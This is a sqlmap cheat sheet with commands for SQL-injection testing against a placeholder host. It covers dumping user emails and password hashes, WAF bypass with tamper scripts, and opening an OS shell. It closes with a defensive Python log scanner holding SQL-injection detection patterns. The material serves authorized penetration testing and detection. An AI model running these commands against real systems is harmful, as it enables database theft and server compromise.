sqlmap Cheat Sheet
Automated SQL injection detection and exploitation for web parameters, headers, and cookies.
Overview
sqlmap automates finding and exploiting SQL injection in HTTP parameters, cookies, headers, and POST bodies. Use after Burp/ZAP or manual testing shows suspicious behavior, or to confirm/time-box injection on authorized targets.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
sudo apt update && sudo apt install -y sqlmap
or
pip install sqlmap
or
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
Essential commands
Single URL parameter
sqlmap -u "https://target.example/item?id=1" --batch
POST body from Burp request file
sqlmap -r request.txt --batch
Cookie-authenticated session
sqlmap -u "https://target.example/dashboard" --cookie="PHPSESSID=abc123" --batch
Enumerate DBMS and current user
sqlmap -u "https://target.example/item?id=1" --current-user --current-db --batch
Quick one-liners
Test a URL parameter for SQL injection
sqlmap -u "https://target.example/item?id=1" --batch
Run sqlmap from a Burp saved request
sqlmap -r request.txt --batch
List databases after injection is found
sqlmap -u "https://target.example/item?id=1" --dbs --batch
Get current DB user and database name
sqlmap -u "https://target.example/item?id=1" --current-user --current-db --batch
Route traffic through Burp proxy
sqlmap -r request.txt --proxy=http://127.0.0.1:8080 --batch
Common workflows
Confirm injection and enumerate databases —
sqlmap -u "https://target.example/search?q=test" --batch --level=3 --risk=2
sqlmap -u "https://target.example/search?q=test" --dbs --batch
sqlmap -u "https://target.example/search?q=test" -D appdb --tables --batch
sqlmap -u "https://target.example/search?q=test" -D appdb -T users --columns --batch
sqlmap -u "https://target.example/search?q=test" -D appdb -T users -C email,password_hash --dump --batch
Save raw HTTP request to request.txt (right-click in Burp → Copy to file) —
sqlmap -r request.txt -p id --batch --level=3
sqlmap -r request.txt --dbs --batch
WAF bypass and tamper scripts —
sqlmap -u "https://target.example/item?id=1" --tamper=space2comment,between --random-agent --batch
sqlmap -r request.txt --proxy=http://127.0.0.1:8080 --batch
OS shell (only when in scope and MSSQL/MySQL with stacked queries) —
sqlmap -u "https://target.example/item?id=1" --os-shell --batch
sqlmap -u "https://target.example/item?id=1" --os-pwn --batch
Flags reference
| Flag | Description |
|---|---|
| -u URL | Target URL |
| -r FILE | Load HTTP request from file |
| -p PARAM | Test specific parameter(s) |
| --data | POST data string |
| --cookie | Cookie header value |
| --header | Extra HTTP header |
| --level=1-5 | Test depth (default 1) |
| --risk=1-3 | Payload risk (default 1) |
| --batch | Non-interactive defaults |
| --dbs | List databases |
| -D DB | Database name |
| --tables | List tables |
| -T TABLE | Table name |
| --columns | List columns |
| -C COL | Column name(s) |
| --dump | Dump table data |
| --tamper=SCRIPT | Payload tamper script(s) |
| --proxy | HTTP/S proxy (e.g. Burp) |
| --random-agent | Random User-Agent |
| --threads=N | Concurrent HTTP requests |
| --os-shell | Interactive OS shell |
| --technique=BEUSTQ | Injection techniques to use |
Tips
- Start with --batch --level=1 --risk=1 and raise level/risk only when needed; keeping them low reduces noise and false positives.
- Always test through Burp (--proxy=http://127.0.0.1:8080) to verify requests and stay in scope.
- Use -r request.txt for authenticated or complex multi-parameter requests.
- --dump can be large and sensitive; restrict to agreed tables/columns with -C.
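From the defender's side of the same workflows, an added example that is not part of sqlmap or of this cheat sheet: a small Python scanner that flags sqlmap-style requests in combined-format web access logs. The log lines in SAMPLE_LOG are constructed; the code shows why the default sqlmap/ User-Agent is only a weak signal (--random-agent removes it) and how the space2comment and between tamper scripts from the WAF-bypass workflow change what a payload rule has to match.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); no real hosts or traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /item?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /item?id=1%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /item?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /item?id=1/**/AND/**/1=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [01/Jan/2024:12:00:05 +0000] "GET /item?id=1%20AND%202%20BETWEEN%202%20AND%202 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"$')

# Keyword rules, matched against the URL-decoded and comment-stripped request line.
SQL_SIGNATURES = {
    "boolean": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),                  # technique B
    "time": re.compile(r"\b(SLEEP|BENCHMARK|pg_sleep|WAITFOR\s+DELAY)\b", re.I),  # technique T
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),                   # technique U
    "tamper-between": re.compile(r"\bBETWEEN\s+\S+\s+AND\s+\S+", re.I),          # --tamper=between rewrites '='
}
COMMENT_RE = re.compile(r"/\*.*?\*/")  # --tamper=space2comment replaces spaces with /**/

def analyze_line(line):
    """Return {'ip', 'tags'} for one log line, or None if it is clean or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    tags = []
    # The default User-Agent names the tool, but --random-agent removes that signal,
    # so the payload checks below must work without it.
    if "sqlmap/" in m["ua"].lower():
        tags.append("sqlmap-ua")
    decoded = unquote_plus(m["req"])
    if COMMENT_RE.search(decoded):
        tags.append("tamper-space2comment")
    normalized = COMMENT_RE.sub(" ", decoded)  # undo the tamper so keyword rules still fire
    tags += [name for name, rx in SQL_SIGNATURES.items() if rx.search(normalized)]
    return {"ip": m["ip"], "tags": tags} if tags else None

def scan_log(text):
    """Findings for every suspicious line in an access log."""
    return [f for f in (analyze_line(ln) for ln in text.splitlines()) if f]

def suspicious_ips(findings, min_hits=2):
    """Client IPs with at least min_hits flagged requests, for alerting or blocking triage."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= min_hits}
```

Run against real logs, the comment-stripping step is what keeps the boolean rule firing once space2comment is in play; without it only the User-Agent rule would catch the second request.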